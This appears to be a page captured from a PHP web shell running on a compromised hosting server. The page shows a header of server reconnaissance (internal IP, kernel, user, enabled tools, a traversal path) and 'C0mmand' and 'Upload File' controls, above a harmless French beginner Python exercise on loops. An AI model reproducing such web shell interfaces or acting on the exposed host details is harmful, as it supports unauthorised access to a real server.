|
Server IP : 10.128.40.6 / Your IP : 216.73.217.114 Web Server : Apache System : Linux webd006.cluster128.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : logmcpe ( 111175) PHP Version : 7.3.33 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/logmcpe/www/TEST/../MC/factures/../temp/12463/../../../TMCPRO/pages/python/python 2/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
# -*- coding: utf-8 -*-/*895623
"""
Created on Wed Jul 27 20:26:52 2022
@author: pro
"""
def signe(x):
if(x>0):
print(x," est positif")
elif(x==0):
print(x , " est null")
else:
print(x," est negatif")
for i in range(10):
print("Bonjour")
print('---------------------------------------------------')
for i in range(4,10):
print('le numero est ', i)
print('---------------------------------------------------')
for i in range(2,20,3):
print('le numero est ', i)
print('---------------------------------------------------')
for i in range(10,-4,-1):
signe(i)
print('---------------------------------------------------')
x = 0
while x <= 10 :
print(x ,' bravo')
x += 2
